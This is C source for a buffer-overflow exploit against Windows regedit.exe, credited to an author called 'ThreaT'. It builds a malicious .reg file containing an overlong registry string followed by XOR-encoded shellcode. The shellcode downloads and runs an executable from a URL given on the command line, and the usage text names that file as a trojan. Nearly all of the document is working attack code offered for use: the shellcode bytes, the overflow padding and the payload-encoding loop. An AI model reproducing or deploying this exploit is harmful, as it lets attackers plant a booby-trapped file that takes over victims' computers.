
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int CREATE_ALWAYS ;
 int CloseHandle (scalar_t__) ;
 scalar_t__ CreateFile (char*,int ,int ,int *,int ,int ,int *) ;
 int ExitProcess (int ) ;
 int FILE_ATTRIBUTE_NORMAL ;
 int FILE_SHARE_WRITE ;
 int GENERIC_WRITE ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int LPTR ;
 scalar_t__ LocalAlloc (int ,int) ;
 scalar_t__ RegFile ;
 char* ToWideChar (char*) ;
 int Write (char*,int) ;
 int lstrcat (char*,char*) ;
 int lstrcpy (char*,char*) ;
 int memset (char*,int ,int) ;
 int printf (char*,...) ;
 int strlen (char*) ;

void main (int argc, char *argv[])
{
 int i;
 char entete[] = "Windows Registry Editor Version 5.00\r\n\r\n"
   "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Discovered\\and\\coded\\by\\ThreaT]\r\n",

 *MastaBuff, *myurl,

 RealGenericShellcode[] =

 "\xAA\xC6\x02\x01"


 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"


 "\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
 "\x34\x99\xAA\x84\xC0\x75\xF8"


 "\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
 "\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
 "\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
 "\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
 "\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
 "\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
 "\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
 "\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
 "\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
 "\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
 "\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
 "\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
 "\x66\x49\x71\xe6\x66\x66\x66";

 printf ("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
  "Regedit.exe Buffer Overflow Exploit\n"
  "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
  "Discovered & Coded By ThreaT.\n\n"
  "contact : ThreaT@Ifrance.com\n"
  "URL : http://www.chez.com/mvm\n\n");

 if (!argv[1])
 {
  printf ("_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n"
   "Usage   : regexploit.exe <URL://trojan.exe>\n"
   "Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe\n"
   "_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n");
  ExitProcess (0);
 }



 RegFile = CreateFile ("VulnFile.reg",GENERIC_WRITE,FILE_SHARE_WRITE,
        ((void*)0),CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,((void*)0));

 if (RegFile == INVALID_HANDLE_VALUE)
 {
  printf ("Cannot create a vuln regfile !\n");
  ExitProcess (0);
 }

 Write ("\xFF\xFE",2);
 Write (ToWideChar (entete),strlen (entete)*2);

 MastaBuff = (char *) LocalAlloc (LPTR,270);
 MastaBuff[0] = '"'; memset (&MastaBuff[1],'0',260);

 Write (ToWideChar (MastaBuff),strlen (MastaBuff)*2);

 myurl = (char *) LocalAlloc (LPTR, strlen (argv[1])+10);
 lstrcpy (myurl,argv[1]);

 for (i=0; i < strlen (argv[1]); argv[1][i++]^=0x99);
 lstrcat (RealGenericShellcode,argv[1]);
 lstrcat (RealGenericShellcode,"\x99");

 Write (RealGenericShellcode,strlen (RealGenericShellcode));

 CloseHandle (RegFile);

 printf ("un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree\n"
  "pour downloader et executer '%s'\n",myurl);

}
